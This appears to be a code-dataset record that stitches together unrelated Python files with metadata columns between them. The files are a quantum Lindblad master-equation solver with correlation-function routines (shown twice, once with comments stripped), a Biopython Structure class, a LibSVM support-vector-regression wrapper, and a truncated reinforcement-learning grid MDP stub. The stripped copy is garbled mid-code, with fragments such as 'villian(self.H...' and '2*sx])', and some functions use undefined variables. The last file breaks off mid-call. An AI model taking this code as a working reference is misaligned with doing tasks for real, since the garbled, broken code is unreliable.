out[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return out
def _correlation_2p_1t(omegas, rho0, ops, L):
a, b = ops
cor = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
cor[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return cor
def sort(eigvals, eigvecs):
idx = np.argsort(eigvals)
eigvals = eigvals[idx]
eigvecs = eigvecs[:,idx]
return eigvals, eigvecs
def cdot(a, b):
"""
matrix product of a.H.dot(b)
Parameters
----------
a : TYPE
DESCRIPTION.
b : TYPE
DESCRIPTION.
Returns
-------
None.
"""
return dag(a) @ b
def absorption(mol, omegas, c_ops):
"""
superoperator formalism for absorption spectrum
Parameters
----------
mol : TYPE
DESCRIPTION.
omegas: vector
detection window of the spectrum
c_ops : TYPE
list of collapse operators
Returns
-------
None.
"""
gamma = 0.02
l = op2sop(H) + 1j * c_op.to_linblad(gamma=gamma)
ntrans = 3 * nstates # number of transitions
eigvals1, U1 = eigs(l, k=ntrans, which='LR')
eigvals1, U1 = sort(eigvals1, U1)
# print(eigvals1)
omegas = np.linspace(0.1 , 10.5, 200)
rho0 = Qobj(dims=[10,10])
rho0.data[0,0] = 1.0
ops = [sz, sz]
# out = correlation_2p_1t(omegas, rho0, ops, L)
# print(eigvecs)
eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
eigvals2, U2 = sort(eigvals2, U2)
#idx = np.where(eigvals2.real > 0.2)[0]
#print(idx)
norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
la = np.zeros(len(omegas), dtype=complex) # linear absorption
for j, omega in enumerate(omegas):
for n in range(ntrans):
la[j] += np.vdot(dip.to_vector(), U1[:,n]) * \
np.vdot(U2[:,n], dip.dot(rho0).to_vector()) \
/(omega - eigvals1[n]) / norm[n]
fig, ax = plt.subplots()
# ax.scatter(eigvals1.real, eigvals1.imag)
ax.plot(omegas, -2 * la.imag)
return
class Lindblad_solver:
def __init__(self, H, c_ops=None):
"""
Liouville equation solver.
Parameters
----------
H : TYPE
DESCRIPTION.
c_ops : TYPE, optional
DESCRIPTION. The default is None.
Returns
-------
None.
"""
self.H = H
self.c_ops = c_ops
self.L = None
self.dim = H.shape[-1]**2
self.idv = operator_to_vector(np.identity(H.shape[-1]))
self.left_eigvecs = None
self.right_eigvecs = None
self.eigvals = None
self.norm = None
# self.nstates = None # number of states used while diagonalizing L
def liouvillian(self):
L = liouvillian(self.H, self.c_ops)
self.L = L
return L
def eigenstates(self, k=None):
if self.L is None:
# raise ValueError('L is None. Call liouvillian to construct L first.')
L = self.liouvillian()
else:
L = self.L
N = L.shape[-1]
if k is None:
w, vl, vr = scipy.linalg.eig(L.toarray(), left=True, \
right=True)
self.eigvals = w
self.left_eigvecs = vl
self.right_eigvecs = vr
# self.norm = [np.vdot(vl[:,n], vr[:,n]) for n in range(self.dim)]
self.norm = np.diagonal(cdot(vl, vr)).real
elif k < N-1:
# right eigenvectors of L
evals1, U1 = eigs(L, k=k, which='LR')
evals1, U1 = sort(evals1, U1)
# left
evals2, U2 = eigs(dag(L), k=k, which='LR')
evals2, U2 = sort(evals2, U2)
else:
raise ValueError('k should be < the size of the matrix.')
return w, vr, vl
def evolve(self, rho0, tlist, e_ops):
result = Result(times=tlist)
# evals, evecs_r, evecs_l = self.eigvals, self.eigvecs_right,\
# self.eigvecs_left
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
norm = self.norm
# print('norm', norm)
rho0 = operator_to_vector(rho0)
# if k is None:
# k = self.dim
k = U1.shape[-1]
observables = np.zeros((len(tlist), len(e_ops)), dtype=complex)
coeff = [np.vdot(U2[:,n], rho0)/norm[n] for n in range(k)]
for i, t in enumerate(tlist):
rho = U1.dot(coeff * exp(evals * t))
# print(trace(rho))
observables[i, :] = [obs(rho, e_op) for e_op in e_ops]
result.observables = observables
return result
def correlation_2op_1t(self, rho0, ops, tlist):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b = ops
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
# if k is None:
# k = self.dim
k = U1.shape[-1]
# norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(k)]
norm = self.norm
idv = self.idv
cor = np.zeros(len(tlist), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i, t in enumerate(tlist):
cor[i] = np.sum(exp(evals * t) * coeff)
return cor
def correlation_2op_1w(self, rho0, ops, w):
"""
Compute S(w) = <A(w)B> = int_0^\infty <A(t)B> exp(iwt) dt
by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b = ops
# if self.eigvals is None:
# evals, U1, U2 = self.eigenstates(k=k)
# else:
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = len(evals)
norm = self.norm
idv = self.idv
S = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i in range(len(w)):
S[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return S
def correlation_3op_1t(self, rho0, ops, t):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(t), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(t)):
cor[i] = np.sum( exp(evals * t[i]) * coeff)
return cor
def correlation_3op_1w(self, rho0, ops, w):
"""
Compute <A(t)B> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(w)):
cor[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return cor
def correlation_3op_2t(self, rho0, ops, tlist, taulist, k=None):
"""
Compute <A(t)B(t+tau)C(t)> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
a, b, c = ops
rho0 = operator_to_vector(rho0)
cor = np.zeros((len(tlist), len(taulist)), dtype=complex)
# diagonalize the Liouvillian
# evals, U1, U2 = self.eigenstates(k=k)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
if k is None:
k = self.dim
# assert(np.allclose(evals1, evals2.conj()))
# print(evals2)
# assert(evals1.imag.all() > 0)
# assert(np.allclose(evals1, evals2.conj(), atol=1e-4))
#norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(k)]
norm = self.norm
idv = self.idv
coeff = np.zeros((k,k), dtype=complex)
for m in range(k):
for n in range(k):
coeff[m, n] = np.vdot(idv, left(b).dot(U1[:, m])) * \
np.vdot(U2[:,m], right(a).dot(left(c).dot(U1[:,n])))/norm[m]\
* np.vdot(U2[:, n], rho0)/norm[n]
# for i, t in enumerate(tlist):
# for j, tau in enumerate(taulist):
tmp1 = exp(np.outer(evals, taulist))
tmp2 = exp(np.outer(evals, tlist))
cor = tmp1.T @ coeff @ tmp2
return cor
def correlation_4op_2t(self, rho0, ops, tlist, taulist, k=None):
"""
Compute <A(t)B(t+tau)C(t)> by diagonalizing the Liouvillian.
Returns
-------
1D array.
correlation function.
"""
if len(ops) != 4:
raise ValueError('Number of operators is not 4.')
else:
a, b, c, d = ops
corr = self.correlation_3op_2t(rho0=rho0, ops=[a, b@c, d], tlist=tlist, \
taulist=taulist, k=k)
return corr
if __name__ == '__main__':
from lime.units import au2fs, au2ev
s0, sx, sy, sz = pauli()
nstates = 2
H = np.diagflat([0, 1])/au2ev + 0.5/au2ev*sx
#h = np.diagflat(np.arange(10))
dip = np.zeros(H.shape)
dip[0,:] = dip[:,0] = np.random.rand(nstates)
c_op = dip
gamma = 0.05
# l = h.to_super() + 1j * c_op.to_linblad(gamma=gamma)
# l = liouvillian(H, c_ops=[gamma*c_op])
# ntrans = 3 * nstates # number of transitions
# eigvals1, U1 = eigs(l, k=ntrans, which='LR')
# eigvals1, U1 = sort(eigvals1, U1)
# print(eigvals1.real)
# omegas = np.linspace(0.1 , 10.5, 200)
from lime.phys import ket2dm
from lime.style import matplot, subplots
rho0 = ket2dm(np.array([1.0, 0.0]))
# rho0.data[0,0] = 1.0
ops = [sx, sx]
# out = correlation_2p_1t(omegas, rho0, ops, L)
# print(eigvecs)
# eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
# eigvals2, U2 = sort(eigvals2, U2)
# #idx = np.where(eigvals2.real > 0.2)[0]
# #print(idx)
# norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
# la = np.zeros(len(omegas), dtype=complex) # linear absorption
# for j, omega in enumerate(omegas):
# for n in range(ntrans):
# la[j] += np.vdot(operator_to_vector(dip), U1[:,n]) * \
# np.vdot(U2[:,n], operator_to_vector(dip.dot(rho0))) \
# /(omega - eigvals1[n]) / norm[n]
# fig, ax = plt.subplots()
# # ax.scatter(eigvals1.real, eigvals1.imag)
# ax.plot(omegas, -2 * la.imag)
# plt.show()
solver = Lindblad_solver(H, c_ops=[0.02*sx])
# solver.liouvillian()
solver.eigenstates()
# print(solver.right_eigvecs)
times = np.linspace(0, 40)/au2fs
result = solver.evolve(rho0, tlist=times, e_ops=[sx, sz])
# cor = solver.correlation_2op_1t(rho0=rho0, ops=[sx, sx], tlist=times)
w = np.linspace(0.4, 2., 100)/au2ev
S = solver.correlation_3op_1w(rho0=rho0, ops=[sx, sx, sx], w=w)
fig, ax = subplots()
ax.plot(w * au2ev, S.real)
# print(cor)
# fig, ax = matplot(times, times, cor.real)
# cor = solver.correlation_3op_2t(ops=[sx, sx, sz], taulist=times, tlist=times, rho0=rho0, k=4)
# fig, ax = subplots()
# # # ax.scatter(eigvals1.real, eigvals1.imag)
# ax.plot(result.times, result.observables[:,1])
# plt.show()
# from lime.style import matplot
# fig, ax = matplot(times, times, cor.real)
| 22.497701
| 99
| 0.535278
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import kron, identity, issparse
from scipy.sparse.linalg import eigs
import scipy
import math
from numba import jit
from numpy import exp
from lime.phys import dag, pauli
from lime.mol import Result
def liouvillian(H, c_ops):
if c_ops is None:
c_ops = []
l = -1j * operator_to_superoperator(H)
for c_op in c_ops:
l = l + lindblad_dissipator(c_op)
return l
class Qobj():
def __init__(self, data=None, dims=None):
self.dims = dims
self.data = data
if data is None:
self.data = np.random.randn(*dims)
self.shape = self.data.shape
return
def dot(self, b):
return Qobj(np.dot(self.data, b.data))
def conjugate(self):
return np.conjugate(self.data)
def to_vector(self):
return operator_to_vector(self.data)
def to_super(self, type='commutator'):
return operator_to_superoperator(self.data, type=type)
def to_linblad(self, gamma=1.):
l = self.data
return gamma * (kron(l, l.conj()) - \
operator_to_superoperator(dag(l).dot(l), type='anticommutator'))
def liouville_space(N):
return
def operator_to_vector(rho):
if isinstance(rho, np.ndarray):
return rho.flatten()
else:
return rho.toarray().flatten()
def dm2vec(rho):
if issparse(rho):
n, m = rho.shape
return rho.tolil().reshape((n*m, 1))
else:
return rho.flatten()
# transform an operator/density matrix to a vector in Liouville space
# Parameters
# ----------
# A : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
def op2sop(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def to_super(a, kind='commutator'):
return operator_to_superoperator(a, kind=kind)
def vec2mat_index(N, I):
j = int(I / N)
i = I - N * j
return i, j
def mat2vec_index(N, i, j):
return i + N * j
def operator_to_superoperator(a, kind='commutator'):
N = a.shape[-1]
idm = identity(N)
if kind in ['commutator', 'c', '-']:
return kron(a, idm) - kron(idm, a.T)
elif kind in ['left', 'l']:
return kron(a, idm)
elif kind in ['right', 'r']:
return kron(idm, a.T)
elif kind in ['anticommutator', 'a', '+']:
return kron(a, idm) + kron(idm, a.T)
else:
raise ValueError('Error: superoperator {} does not exist.'.format(kind))
def lindblad_dissipator(l):
return kron(l, l.conj()) - 0.5 *\
operator_to_superoperator(dag(l).dot(l), kind='anticommutator')
def left(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(a, idm)
def right(a):
if issparse(a):
idm = identity(a.toarray().shape[-1])
else:
idm = identity(a.shape[-1])
return kron(idm, a.T)
def kraus(a):
al = left(a)
ar = right(dag(a))
return ar.dot(al)
# Return expectation value of a for rho in Liouville space.
# Parameters
# ----------
# rho : TYPE
# DESCRIPTION.
# a : TYPE
# DESCRIPTION.
# Returns
# -------
# None.
# """
def obs(rho, a):
return np.vdot(operator_to_vector(dag(a)), rho)
def trace(rho):
n = math.isqrt(len(rho))
return np.vdot(operator_to_vector(np.identity(n)), rho)
def resolvent(omega, L):
idm = np.identity(L.shape[0])
return np.linalg.inv(omega * idm - L)
def _correlation_2p_1f(omegas, rho0, ops, L):
a, b = ops
out = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
out[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return out
def _correlation_2p_1t(omegas, rho0, ops, L):
a, b = ops
cor = np.zeros(len(omegas))
for j in range(len(omegas)):
omega = omegas[j]
r = resolvent(omega, L)
cor[j] = operator_to_vector(a.T).dot(r.dot(operator_to_vector(b.rho0)))
return cor
def sort(eigvals, eigvecs):
idx = np.argsort(eigvals)
eigvals = eigvals[idx]
eigvecs = eigvecs[:,idx]
return eigvals, eigvecs
def cdot(a, b):
return dag(a) @ b
def absorption(mol, omegas, c_ops):
gamma = 0.02
l = op2sop(H) + 1j * c_op.to_linblad(gamma=gamma)
ntrans = 3 * nstates
eigvals1, U1 = eigs(l, k=ntrans, which='LR')
eigvals1, U1 = sort(eigvals1, U1)
omegas = np.linspace(0.1 , 10.5, 200)
rho0 = Qobj(dims=[10,10])
rho0.data[0,0] = 1.0
ops = [sz, sz]
eigvals2, U2 = eigs(dag(l), k=ntrans, which='LR')
eigvals2, U2 = sort(eigvals2, U2)
norm = [np.vdot(U2[:,n], U1[:,n]) for n in range(ntrans)]
la = np.zeros(len(omegas), dtype=complex)
for j, omega in enumerate(omegas):
for n in range(ntrans):
la[j] += np.vdot(dip.to_vector(), U1[:,n]) * \
np.vdot(U2[:,n], dip.dot(rho0).to_vector()) \
/(omega - eigvals1[n]) / norm[n]
fig, ax = plt.subplots()
ax.plot(omegas, -2 * la.imag)
return
class Lindblad_solver:
def __init__(self, H, c_ops=None):
self.H = H
self.c_ops = c_ops
self.L = None
self.dim = H.shape[-1]**2
self.idv = operator_to_vector(np.identity(H.shape[-1]))
self.left_eigvecs = None
self.right_eigvecs = None
self.eigvals = None
self.norm = None
villian(self.H, self.c_ops)
self.L = L
return L
def eigenstates(self, k=None):
if self.L is None:
L = self.liouvillian()
else:
L = self.L
N = L.shape[-1]
if k is None:
w, vl, vr = scipy.linalg.eig(L.toarray(), left=True, \
right=True)
self.eigvals = w
self.left_eigvecs = vl
self.right_eigvecs = vr
self.norm = np.diagonal(cdot(vl, vr)).real
elif k < N-1:
evals1, U1 = eigs(L, k=k, which='LR')
evals1, U1 = sort(evals1, U1)
evals2, U2 = eigs(dag(L), k=k, which='LR')
evals2, U2 = sort(evals2, U2)
else:
raise ValueError('k should be < the size of the matrix.')
return w, vr, vl
def evolve(self, rho0, tlist, e_ops):
result = Result(times=tlist)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
norm = self.norm
rho0 = operator_to_vector(rho0)
k = U1.shape[-1]
observables = np.zeros((len(tlist), len(e_ops)), dtype=complex)
coeff = [np.vdot(U2[:,n], rho0)/norm[n] for n in range(k)]
for i, t in enumerate(tlist):
rho = U1.dot(coeff * exp(evals * t))
observables[i, :] = [obs(rho, e_op) for e_op in e_ops]
result.observables = observables
return result
def correlation_2op_1t(self, rho0, ops, tlist):
a, b = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(tlist), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i, t in enumerate(tlist):
cor[i] = np.sum(exp(evals * t) * coeff)
return cor
def correlation_2op_1w(self, rho0, ops, w):
a, b = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = len(evals)
norm = self.norm
idv = self.idv
S = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(a).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(b.dot(rho0)))/norm[n]\
for n in range(k)])
for i in range(len(w)):
S[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return S
def correlation_3op_1t(self, rho0, ops, t):
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(t), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(t)):
cor[i] = np.sum( exp(evals * t[i]) * coeff)
return cor
def correlation_3op_1w(self, rho0, ops, w):
a, b, c = ops
evals, U1, U2 = self.eigvals, self.right_eigvecs, self.left_eigvecs
k = U1.shape[-1]
norm = self.norm
idv = self.idv
cor = np.zeros(len(w), dtype=complex)
coeff = np.array([np.vdot(idv, left(b).dot(U1[:,n])) * \
np.vdot(U2[:,n], operator_to_vector(c @ rho0 @ a))/norm[n]\
for n in range(k)])
for i in range(len(w)):
cor[i] = np.sum( -1./(evals + 1j * w[i]) * coeff)
return cor
def correlation_3op_2t(self, rho0, ops, tlist, taulist, k=None):
a, b, c = ops
rho0 = operator_to_vector(rho0)
cor = np.zeros((len(tlist), len(taulist)), dtype=complex)
evals = self.eigvals
U1 = self.right_eigvecs
U2 = self.left_eigvecs
if k is None:
k = self.dim
norm = self.norm
idv = self.idv
coeff = np.zeros((k,k), dtype=complex)
for m in range(k):
for n in range(k):
coeff[m, n] = np.vdot(idv, left(b).dot(U1[:, m])) * \
np.vdot(U2[:,m], right(a).dot(left(c).dot(U1[:,n])))/norm[m]\
* np.vdot(U2[:, n], rho0)/norm[n]
tmp1 = exp(np.outer(evals, taulist))
tmp2 = exp(np.outer(evals, tlist))
cor = tmp1.T @ coeff @ tmp2
return cor
def correlation_4op_2t(self, rho0, ops, tlist, taulist, k=None):
if len(ops) != 4:
raise ValueError('Number of operators is not 4.')
else:
a, b, c, d = ops
corr = self.correlation_3op_2t(rho0=rho0, ops=[a, b@c, d], tlist=tlist, \
taulist=taulist, k=k)
return corr
if __name__ == '__main__':
from lime.units import au2fs, au2ev
s0, sx, sy, sz = pauli()
nstates = 2
H = np.diagflat([0, 1])/au2ev + 0.5/au2ev*sx
dip = np.zeros(H.shape)
dip[0,:] = dip[:,0] = np.random.rand(nstates)
c_op = dip
gamma = 0.05
from lime.phys import ket2dm
from lime.style import matplot, subplots
rho0 = ket2dm(np.array([1.0, 0.0]))
ops = [sx, sx]
2*sx])
solver.eigenstates()
times = np.linspace(0, 40)/au2fs
result = solver.evolve(rho0, tlist=times, e_ops=[sx, sz])
w = np.linspace(0.4, 2., 100)/au2ev
S = solver.correlation_3op_1w(rho0=rho0, ops=[sx, sx, sx], w=w)
fig, ax = subplots()
ax.plot(w * au2ev, S.real)
| true
| true
|
1c40fce82fec6b6c713a51aa37d5189ac454d3f6
| 1,379
|
py
|
Python
|
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
fragbuilder/bio_pdb/Structure.py
|
larsbratholm/fragbuilder
|
e16cbcb190403b5fef49811abd11d16d7ef7fb30
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""The structure class, representing a macromolecular structure."""
from .Entity import Entity
class Structure(Entity):
"""
The Structure class contains a collection of Model instances.
"""
def __init__(self, id):
self.level="S"
Entity.__init__(self, id)
# Special methods
def __repr__(self):
return "<Structure id=%s>" % self.get_id()
# Private methods
def _sort(self, m1, m2):
"""Sort models.
This sorting function sorts the Model instances in the Structure instance.
The sorting is done based on the model id, which is a simple int that
reflects the order of the models in the PDB file.
Arguments:
o m1, m2 - Model instances
"""
return cmp(m1.get_id(), m2.get_id())
# Public
def get_chains(self):
for m in self:
for c in m:
yield c
def get_residues(self):
for c in self.get_chains():
for r in c:
yield r
def get_atoms(self):
for r in self.get_residues():
for a in r:
yield a
| 24.625
| 82
| 0.59826
|
from .Entity import Entity
class Structure(Entity):
def __init__(self, id):
self.level="S"
Entity.__init__(self, id)
def __repr__(self):
return "<Structure id=%s>" % self.get_id()
def _sort(self, m1, m2):
return cmp(m1.get_id(), m2.get_id())
def get_chains(self):
for m in self:
for c in m:
yield c
def get_residues(self):
for c in self.get_chains():
for r in c:
yield r
def get_atoms(self):
for r in self.get_residues():
for a in r:
yield a
| true
| true
|
1c40fdf35faba0891f2a51223186847b12b1ad98
| 4,348
|
py
|
Python
|
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | 1
|
2021-09-06T20:21:15.000Z
|
2021-09-06T20:21:15.000Z
|
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | null | null | null |
alphaml/engine/components/models/regression/libsvm_svr.py
|
dingdian110/alpha-ml
|
d6a7a8a8a3452a7e3362bf0ef32b9ac5fe215fde
|
[
"BSD-3-Clause"
] | null | null | null |
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.conditions import EqualsCondition, InCondition
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter
from alphaml.utils.constants import *
from alphaml.utils.model_util import softmax
from alphaml.utils.common import check_none, check_for_bool
from alphaml.engine.components.models.base_model import BaseRegressionModel
class LibSVM_SVR(BaseRegressionModel):
def __init__(self, C, kernel, gamma, shrinking, tol, max_iter,
degree=3, coef0=0, random_state=None):
self.C = C
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.shrinking = shrinking
self.tol = tol
self.max_iter = max_iter
self.random_state = random_state
self.estimator = None
def fit(self, X, Y):
from sklearn.svm import SVR
self.C = float(self.C)
if self.degree is None:
self.degree = 3
else:
self.degree = int(self.degree)
if self.gamma is None:
self.gamma = 0.0
else:
self.gamma = float(self.gamma)
if self.coef0 is None:
self.coef0 = 0.0
else:
self.coef0 = float(self.coef0)
self.tol = float(self.tol)
self.max_iter = float(self.max_iter)
self.shrinking = check_for_bool(self.shrinking)
self.estimator = SVR(C=self.C,
kernel=self.kernel,
degree=self.degree,
gamma=self.gamma,
coef0=self.coef0,
shrinking=self.shrinking,
tol=self.tol,
max_iter=self.max_iter)
self.estimator.fit(X, Y)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'LibSVM-SVR',
'name': 'LibSVM Support Vector Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
C = UniformFloatHyperparameter("C", 0.03125, 32768, log=True,
default_value=1.0)
# No linear kernel here, because we have liblinear
kernel = CategoricalHyperparameter(name="kernel",
choices=["rbf", "poly", "sigmoid"],
default_value="rbf")
degree = UniformIntegerHyperparameter("degree", 2, 5, default_value=3)
gamma = UniformFloatHyperparameter("gamma", 3.0517578125e-05, 8,
log=True, default_value=0.1)
# TODO this is totally ad-hoc
coef0 = UniformFloatHyperparameter("coef0", -1, 1, default_value=0)
# probability is no hyperparameter, but an argument to the SVM algo
shrinking = CategoricalHyperparameter("shrinking", ["True", "False"],
default_value="True")
tol = UniformFloatHyperparameter("tol", 1e-5, 1e-1, default_value=1e-3,
log=True)
# cache size is not a hyperparameter, but an argument to the program!
max_iter = UnParametrizedHyperparameter("max_iter", 2000)
cs = ConfigurationSpace()
cs.add_hyperparameters([C, kernel, degree, gamma, coef0, shrinking,
tol, max_iter])
degree_depends_on_poly = EqualsCondition(degree, kernel, "poly")
coef0_condition = InCondition(coef0, kernel, ["poly", "sigmoid"])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
| 41.018868
| 79
| 0.583947
|
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.conditions import EqualsCondition, InCondition
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter
from alphaml.utils.constants import *
from alphaml.utils.model_util import softmax
from alphaml.utils.common import check_none, check_for_bool
from alphaml.engine.components.models.base_model import BaseRegressionModel
class LibSVM_SVR(BaseRegressionModel):
def __init__(self, C, kernel, gamma, shrinking, tol, max_iter,
degree=3, coef0=0, random_state=None):
self.C = C
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.shrinking = shrinking
self.tol = tol
self.max_iter = max_iter
self.random_state = random_state
self.estimator = None
def fit(self, X, Y):
from sklearn.svm import SVR
self.C = float(self.C)
if self.degree is None:
self.degree = 3
else:
self.degree = int(self.degree)
if self.gamma is None:
self.gamma = 0.0
else:
self.gamma = float(self.gamma)
if self.coef0 is None:
self.coef0 = 0.0
else:
self.coef0 = float(self.coef0)
self.tol = float(self.tol)
self.max_iter = float(self.max_iter)
self.shrinking = check_for_bool(self.shrinking)
self.estimator = SVR(C=self.C,
kernel=self.kernel,
degree=self.degree,
gamma=self.gamma,
coef0=self.coef0,
shrinking=self.shrinking,
tol=self.tol,
max_iter=self.max_iter)
self.estimator.fit(X, Y)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'LibSVM-SVR',
'name': 'LibSVM Support Vector Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
C = UniformFloatHyperparameter("C", 0.03125, 32768, log=True,
default_value=1.0)
kernel = CategoricalHyperparameter(name="kernel",
choices=["rbf", "poly", "sigmoid"],
default_value="rbf")
degree = UniformIntegerHyperparameter("degree", 2, 5, default_value=3)
gamma = UniformFloatHyperparameter("gamma", 3.0517578125e-05, 8,
log=True, default_value=0.1)
coef0 = UniformFloatHyperparameter("coef0", -1, 1, default_value=0)
shrinking = CategoricalHyperparameter("shrinking", ["True", "False"],
default_value="True")
tol = UniformFloatHyperparameter("tol", 1e-5, 1e-1, default_value=1e-3,
log=True)
max_iter = UnParametrizedHyperparameter("max_iter", 2000)
cs = ConfigurationSpace()
cs.add_hyperparameters([C, kernel, degree, gamma, coef0, shrinking,
tol, max_iter])
degree_depends_on_poly = EqualsCondition(degree, kernel, "poly")
coef0_condition = InCondition(coef0, kernel, ["poly", "sigmoid"])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
| true
| true
|
1c40febbb24609df26dd7e03553d56d35ba52d03
| 582
|
py
|
Python
|
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/simple_grid/episodic/mdp.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
import gin
from colosseum.loops import human_loop
from colosseum.mdps import EpisodicMDP
from colosseum.mdps.simple_grid.simple_grid import SimpleGridMDP, SimpleGridReward
@gin.configurable
class SimpleGridEpisodic(EpisodicMDP, SimpleGridMDP):
pass
if __name__ == "__main__":
mdp = SimpleGridEpisodic(
reward_type=SimpleGridReward.AND,
seed=42,
